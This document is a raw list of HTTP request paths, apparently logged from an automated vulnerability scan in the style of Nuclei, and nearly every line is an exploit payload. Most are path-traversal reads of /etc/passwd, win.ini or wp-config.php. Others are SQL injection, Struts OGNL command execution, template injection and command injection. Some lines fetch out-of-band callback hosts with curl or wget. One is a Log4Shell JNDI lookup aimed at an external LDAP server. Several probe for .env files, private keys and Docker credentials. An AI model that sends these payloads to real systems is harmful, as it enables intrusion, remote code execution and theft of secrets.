/GponForm/diag_Form?images/
///remote/fgt_lang?lang=/../../../..//////////dev/
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
/adm/file.cgi?next_file=%2fetc%2fpasswd
/index.php?class=../../../../../../../etc/passwd%00
/?host=http://0177.0.0.1/server-status
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/javax.faces.resource/dynamiccontent.properties.xhtml
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/test.txt%0D%0ASet-Cookie:CRLFInjection%3DTest%0D%0ALocation:%20example.com%0D%0AX-XSS-Protection:0
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/?file=http://0177.0.0.1/etc/passwd
/uir//etc/passwd
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/apply_sec.cgi
/login
/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
/goform/setmac
/cgi-bin/privatekey.pem
/login.php?action=login&type=admin
/?a=display&templateFile=README.md
/image/image://..%252fetc%252fpasswd
/owa/auth/x.js
/..../..../..../..../..../..../..../..../..../windows/win.ini
/agc/vicidial_mysqli_errors.txt
/mifs/.%3B/services/LogService
/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/casa/nodes/thumbprints
/.env.stage
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/api/.env
/wan.htm
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/../../../../../../../../../../../../../etc/passwd
/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
/../../../../../../../../windows/win.ini
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
/users/sign_in
/wp-json/acf/v3/options/a?id=active&field=plugins
/install/includes/configure.php
/?url=http://0177.0.0.1/server-status
/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/jars/upload
/install/install.php?step=4
/images/../info.html
/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/webtools/control/main
/../../../../../../../../../../../../../../var/www/html/index.html
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/etc/groovyconsole.html
/.dockercfg
/website/blog/
/file%3DC:%5CWindows%5Cwin.ini
/zms/admin/index.php
/actions/authenticate.php
/ucmdb-api/connect
/axis2-admin/login
/api/settings/values
/?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/admin/
/service/v1/service-details
/api/experimental/test
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/status.htm
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/applications.pinpoint
/mantis/verify.php?id=1&confirm_hash=
/bag2
/localhost.key
/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/concrete5/index.php/install
/carbon/admin/login_action.jsp
/25twdJjfpeOIAfKLGmXIrR58YEK.php%5Cx0A
/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25twdFn1R8IFMZbaRUqgJ2XrBY6.php&target=l1_Lw
/bugs/verify.php?confirm_hash=&id=1
/pages/doenterpagevariables.action
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
/verify.php?id=1&confirm_hash=
/sess-bin/login_handler.cgi
/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/run
/.docker/config.json
/druid/index.html
/images/logo/logo-eoffice.php
/install/
/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/index/login.cgi
/solr/admin/
/../../../..//etc/passwd
/download.php?file=../../../../../etc/passwd
/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225twdIMfRgQmjF6PvkbGAf9JfsL.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/password.jsn
/index.php?id=50&file=../../../../../../../../../etc/passwd
/ftb.imagegallery.aspx
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25twdNSQaTD7AIbb34p77k1iifo.jsp
/theme/default/img/../../../../../../../../../../../../../../../..//etc/passwd
/index_sso.php
/.antproxy.php
/RPC2_Login
/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/overview.asp
/html/log
/about/../tree?action=get
/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
/testing-put.txt
/artifactory/ui/auth/login?_spring_security_remember_me=false
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/_fragment?_path=_controller=phpcredits&flag=-1
/DnnImageHandler.ashx?mode=file&url=http://c8gn9o4dtd8ppc0tpffgceoz5rayyyh1r.oast.me
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/__clockwork/app
/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
//css//../../../../../../../../../../../../../../../../../../windows%5Cwin.ini
/ipython/tree
/account/register
/cgi-bin/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/bin/sh
/cgi-bin/../../../../etc/passwd
/node/1?_format=hal_json
/boardDataWW.php
/signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd
/api/experimental/dags/example_trigger_target_dag/dag_runs
/vpn/../vpns/cfg/smb.conf
/webapi/v1/system/accountmanage/account
/console/login/LoginForm.jsp
/mailsms/s?func=ADMIN:appState&dumpConfig=/
/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/tests/support/stores/test_grid_filter.php?query=phpinfo();
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/jolokia/read/getDiagnosticOptions
/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains
/index.php?s=Admin-Data-down&id=../../Conf/config.php
/analytics/telemetry/ph/api/hyper/send?_c&_i=test
/pages/createpage.action?spaceKey=myproj
/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/%20../web-inf/
/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/.../.../.../.../.../.../.../.../.../windows/win.ini
/_search
/private-key
/upload/UploadResourcePic.ashx?ResourceID=8382
/../../../../../../../etc/passwd
/groovyconsole
/.%0D./.%0D./.%0D./.%0D./bin/sh
/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/index.php?page=/etc/passwd%00
/.env_1
/admin/login/?next=/admin/
/../../../../../../../../../../../../../../../../etc/passwd
/cgi-bin/luci/
/cgi-bin/system_mgr.cgi
/_search?pretty
/favicon.ico
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/anchor/errors.log
/.well-known/security.txt
/hue/assets/../../../../../../../etc/passwd
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/wls-wsat/RegistrationRequesterPortType
/index.php?m=member&f=login_save
/wp-content/force-download.php?file=../wp-config.php
/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/wp-admin/install.php
/search?search_key=%7B%7B1337*1338%7D%7D
/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/cgi-bin/../../../bin/sh
/index.php/install
/ajax/networking/get_netcfg.php?iface=;curl%20http://c8gn9o4dtd8ppc0tpffgceoz5weyyy6oo.oast.me/`whoami`;
/.env.save
/query?db=db&q=SHOW%20DATABASES
/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/axis2/axis2-admin/login
/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/api/config
/xmlpserver/ReportTemplateService.xls
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/assets/file:///etc/passwd
/api/experimental/dags/example_trigger_target_dag/paused/false
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/login.php
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
/op/op.Login.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/msa/../../../../../../../../etc/passwd
/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
/download?type=files&filename=../../../../../../../../etc/passwd
/homeaction.php
/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/?q=node&destination=node
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/.axiom/accounts/do.json
/getcfg.php
/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/console/j_security_check
/compress.php?file=../../../../../../../etc/passwd
/checkValid
/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO
/api/users/admin/check
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/webadmin/out
/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/mailingupgrade.php
/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/command.cgi?cat%20/etc/passwd
/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27
/sysmgmt/2015/bmc/session
/.../.../.../.../.../.../.../.../.../etc/passwd
/ui/login.php?user=admin
/device.rsp?opt=user&cmd=list
/lcms/index.php
/$%7Bjndi:ldap://115.28.134.231:1389/Exploit%7D
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/BSW_cxttongr.htm
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/solr/admin/cores?wt=json
/api/v4/ci/lint?include_merged_yaml=true
/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/../../etc/passwd
/nuclei.txt
/api/login
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/version.web
/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
/password.cgi
/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/.env.dev.local
/.env.development.local
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/.env.prod.local
/.env.local
/.env.example
/index.php
/ReportServer/Pages/ReportViewer.aspx
/lucee/25twdDlGC2WB0UMfL2wEIzxdN1B.cfm
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/.env.live
/.env.backup
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/.env.old
/assets/app/something/services/AppModule.class/
/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/account
/http/index.php
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/.env_sample
/web.config.i18n.ashx?l=nuclei&v=nuclei
/login/
/adm/krgourl.php?DOCUMENT_ROOT=http://c8gn9o4dtd8ppc0tpffgceoa8oayynbxn.oast.me
/wp-content/plugins/quiz-master-next/README.md
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/webadmin/index.php
/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/guest_auth/guestIsUp.php
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/pages/createpage-entervariables.action?SpaceKey=x
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/console/
/lucee/admin/imgProcess.cfm?file=/whatever
/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/confluence/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x
/wiki/pages/createpage-entervariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/.env
/cgi/networkDiag.cgi
/25twdIMfRgQmjF6PvkbGAf9JfsL.php
/users/user-dark-features
/.env.production.local
/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/password.html
/en/php/usb_sync.php
/api/userrolelist/systemRoles?require-cfg.js
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/.drone.yml
/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/host.key
/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/lucee/admin/imgProcess.cfm?file=/../../../context/25twdDlGC2WB0UMfL2wEIzxdN1B.cfm
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/.dbeaver/credentials-config.json
/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
/../conf/config.properties
/api/downloads?fileName=../../../../../../../../etc/passwd
/appGet.cgi?hook=get_cfg_clientlist()
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/?author=1
/cgi-bin/login.cgi
/public/config.js
/pages/systemcall.php?command=cat%20/etc/passwd
/.esmtprc
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/actuator/env
/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/uploads/elfinder/elfinder-cke.html
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/login?login=lutron&password=lutron
/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8gn9o4dtd8ppc0tpffgceoadqeyybzrr.oast.me/a%7D
/catalog.php?filename=../../../../../../../../../etc/passwd
/SSI/Auth/ip_snmp.htm
/downloads/../../../../../../../../../etc/passwd
/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/config/databases.yml
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/aj.html?a=devi
/?c=../../../../../../etc/passwd%00
/ajax/api/content_infraction/getIndexableContent
/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/system/sharedir.php
/artifactory/ui/repodata?deploy=true
/_users/org.couchdb.user:poc
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/LetsEncrypt/Index?fileName=/etc/passwd
/admin/elfinder/elfinder-cke.html
/assets/backend/elfinder/elfinder-cke.html
/assets/elFinder-2.1.9/elfinder.html
/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/pages/createpage-entervariables.action
/index.php?plot=;wget%20http://c8gn9o4dtd8ppc0tpffgceoa8heyynn5h.oast.me
/assets/elFinder/elfinder.html
/uploads/assets/backend/elfinder/elfinder.html
/config.js
/mantisBT/verify.php?id=1&confirm_hash=
/elfinder/elfinder-cke.html
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/backend/elfinder/elfinder-cke.html
/uploads/assets/backend/elfinder/elfinder-cke.html
/index.php?page_slug=../../../../../etc/passwd%00
/wp-content/plugins/wp-statistics/readme.txt
/scrm/crm/admin
/plugin/customMethod
/apisix/admin/user/login
/XMLCHART
/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/robots.txt
/struts2-rest-showcase/orders/3
/ajax/render/widget_tabbedcontainer_tab_panel
/sitemap.xml
/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/wp-content/plugins/simple-file-list/ee-file-engine.php
/rootDesc.xml
/$%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue,%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29,%23b%3Dnew%20java.io.InputStreamReader%28%23a%29,%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29,%23d%3Dnew%20char%5B51020%5D,%23c.read%28%23d%29,%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23sbtest.println%28%23d%29,%23sbtest.close%28%29%29%7D/actionChain1.action
/jolokia/exec/com.sun.management:type%3DDiagnosticCommand/compilerDirectivesAdd/%21/etc%21/passwd
/actuator/jolokia/exec/com.sun.management:type%3DDiagnosticCommand/compilerDirectivesAdd/%21/etc%21/passwd
/Side.php
/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld
/_ignition/execute-solution
/webadmin/auth/verification.php
/wp-content/plugins/simple-file-list/ee-upload-engine.php
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/wp-content/uploads/simple-file-list/nuclei.php
/fpui/loginServlet
/?qtproxycall=http://c8gn9o4dtd8ppc0tpffgceozsyeyyyudw.oast.me
/node_modules/mqtt/test/helpers/
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/comm.php?id=../../../../../../../../../../etc/passwd
/orders/3
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/sensorlist.htm
/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/apisix/batch-requests
/api/25twdGL170TlhcqVAP2C4ThFMek
/www.key
